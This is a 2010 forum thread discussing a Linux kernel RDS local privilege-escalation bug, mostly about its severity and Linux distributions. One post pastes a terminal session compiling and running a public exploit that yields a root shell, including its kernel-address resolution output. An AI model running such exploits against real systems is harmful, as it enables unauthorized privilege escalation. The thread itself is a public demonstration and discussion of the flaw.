Posted on 10/22/2010 6:09:25 AM PDT by ShadowAce
Sooo... once you break in then you can own it. But you still have to break in first, right?
More reasons why my abacus is still the only virus free computational device I own.
That was what I understand, also. Doesn’t seem quite as dangerous as they’re making it out to be.
I wish I knew more about how Puppy Linux works, I can’t even unzip an RMP file with unrmp.pet
Maybe I should burn another ISO with a different Linux?
Bookmark
If the documentation isn’t helping you, then yeah. I’m much more familiar with the RPM-based distros, like Fedora.
Is that one free too? I’ll google it.
Obviously, it's more of an issue on multi-user systems. Hosting systems with shell access would be particularly vulnerable. Thank God it's not a remote exploit.
Fedora is free. Most stuff works right out of the box, but you'll want to add the rpmfusion repositories to get the best use of it. (for certain codecs and other stuff.)
“Reliable datagram....”?
Isn’t that an oxymoron?
Only in UDP.
$ gcc linux-rds-exploit.c -o linux-rds-exploit
$ file linux-rds-exploit
linux-rds-exploit: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
$ id
uid=500(zeugma) gid=500(zeugma) groups=500(zeugma),1000(shared)
$ touch /etc/deleteme.txt
touch: cannot touch `/etc/deleteme.txt': Permission denied
$ ./linux-rds-exploit
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xf89c0654
[+] Resolved rds_ioctl to 0xf89bb06a
[+] Resolved commit_creds to 0xc046059f
[+] Resolved prepare_kernel_cred to 0xc0460410
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
sh-4.0# touch /etc/deleteme.txt
sh-4.0# rm /etc/deleteme.txt
sh-4.0# exit
~/Download :)
Wow. Quite interesting. I wonder how long it will take to get a large company’s servers all patched, so the employees don’t go wandering....
Youch.
I’m talking in general - ie, in networking for the last, oh, 40 years, the idea is that datagram service isn’t reliable. You flip it out on the wire, and no guarantee is made of delivery; datagram service is “best effort” delivery.
My first reaction upon reading of “reliable datagram service” was to wonder “Isn’t that what a connection-based protocol is?” You have an indication when you sent the datagram that there was sufficient buffering at the receiver to receive the datagram and all that?
Sigh. Computing hasn’t been the same since we allowed the marketing people to start inventing terms...
Companies don't grant shell access to employees that don't need it.
And, using an exploit like this to get unauthorized root access is grounds for termination at every company I've worked for.
If you are talking about UDP, yes. RDP is a different protocol.
What is RDS and why did we build it?
Reliable Datagram Sockets (RDS) provide in order, non-duplicating, highly available, low overhead, reliable delivery of datagrams between hundreds of thousands of non-connected endpoints.
Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.